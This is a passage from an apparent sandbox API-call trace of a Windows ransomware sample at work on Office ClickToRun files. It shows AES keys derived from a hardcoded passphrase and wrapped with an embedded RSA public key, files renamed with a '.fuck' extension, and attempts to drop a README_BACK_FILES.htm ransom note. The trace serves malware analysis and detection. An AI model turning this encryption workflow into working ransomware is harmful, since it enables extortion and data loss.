dwFileAttributes=0x2) returned 0 [0235.647] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8cc8) returned 1 [0235.657] CryptCreateHash (in: hProv=0x27e8cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.657] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.657] CryptHashData (hHash=0x27eb8e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.657] CryptDeriveKey (in: hProv=0x27e8cc8, Algid=0x6610, hBaseData=0x27eb8e0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb920) returned 1 [0235.658] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.658] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.658] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8008) returned 1 [0235.660] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8008, dwCertEncodingType=0x1, pInfo=0x2797cd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797d08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797d10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebb20) returned 1 [0235.660] CryptEncrypt (in: hKey=0x27ebb20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.661] CryptEncrypt (in: hKey=0x27ebb20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8d50*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8d50*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.661] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8d50, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.661] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.661] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.661] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.661] CloseHandle (hObject=0xffffffff) returned 1 [0235.661] CloseHandle (hObject=0xffffffff) returned 1 [0235.661] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0235.661] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0235.662] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0235.662] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0235.662] CryptDestroyHash (hHash=0x27eb8e0) returned 1 [0235.662] CryptDestroyKey (hKey=0x27eb920) returned 1 [0235.662] CryptReleaseContext (hProv=0x27e8cc8, dwFlags=0x0) returned 1 [0235.662] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0235.662] FindClose (in: hFindFile=0x27eb8a0 | out: hFindFile=0x27eb8a0) returned 1 [0235.663] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0235.663] AreFileApisANSI () returned 1 [0235.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e8998, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 121 [0235.663] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.663] GetLastError () returned 0x5 [0235.663] GetLastError () returned 0x5 [0235.663] FindNextFileA (in: hFindFile=0x27eba20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.663] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27ebd60 [0235.673] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.673] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.673] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.673] GetLastError () returned 0x5 [0235.673] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0235.674] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.674] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.675] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.675] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.675] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8998) returned 1 [0235.689] CryptCreateHash (in: hProv=0x27e8998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.689] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.689] CryptHashData (hHash=0x27eb8e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.689] CryptDeriveKey (in: hProv=0x27e8998, Algid=0x6610, hBaseData=0x27eb8e0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb920) returned 1 [0235.689] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.689] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.689] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e82b0) returned 1 [0235.692] CryptImportPublicKeyInfo (in: hCryptProv=0x27e82b0, dwCertEncodingType=0x1, pInfo=0x2797da8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797dd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797de0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebda0) returned 1 [0235.692] CryptEncrypt (in: hKey=0x27ebda0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.692] CryptEncrypt (in: hKey=0x27ebda0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8ff8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8ff8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.692] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8ff8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.692] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.692] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.692] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.692] CloseHandle (hObject=0xffffffff) returned 1 [0235.692] CloseHandle (hObject=0xffffffff) returned 1 [0235.693] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0235.693] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.693] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0235.693] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0235.694] CryptDestroyHash (hHash=0x27eb8e0) returned 1 [0235.694] CryptDestroyKey (hKey=0x27eb920) returned 1 [0235.694] CryptReleaseContext (hProv=0x27e8998, dwFlags=0x0) returned 1 [0235.694] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.694] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.694] GetLastError () returned 0x5 [0235.694] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash")) returned 0x20 [0235.694] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0235.694] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.695] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.695] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.695] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8f70) returned 1 [0235.707] CryptCreateHash (in: hProv=0x27e8f70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.707] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.707] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.707] CryptDeriveKey (in: hProv=0x27e8f70, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebbe0) returned 1 [0235.707] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.707] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.707] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8cc8) returned 1 [0235.709] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8cc8, dwCertEncodingType=0x1, pInfo=0x27f6128*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6158*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6160*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb8e0) returned 1 [0235.709] CryptEncrypt (in: hKey=0x27eb8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.710] CryptEncrypt (in: hKey=0x27eb8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8e60*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8e60*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.710] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8e60, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.710] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.710] CryptEncrypt (in: hKey=0x27ebbe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.710] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.710] CloseHandle (hObject=0xffffffff) returned 1 [0235.710] CloseHandle (hObject=0xffffffff) returned 1 [0235.710] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0235.710] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0235.711] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.gsg")) returned 0 [0235.711] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\s640.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\s640.hash.fuck")) returned 0 [0235.711] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.711] CryptDestroyKey (hKey=0x27ebbe0) returned 1 [0235.711] CryptReleaseContext (hProv=0x27e8f70, dwFlags=0x0) returned 1 [0235.711] FindNextFileA (in: hFindFile=0x27ebd60, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.711] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.711] GetLastError () returned 0x5 [0235.712] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml")) returned 0x20 [0235.719] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml", dwFileAttributes=0x80) returned 0 [0235.719] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.719] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\stream.platform.x-none.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.720] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\Stream.Platform.x-none.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.720] CryptAcquireContextA (in: phProv=0x2b9d598, 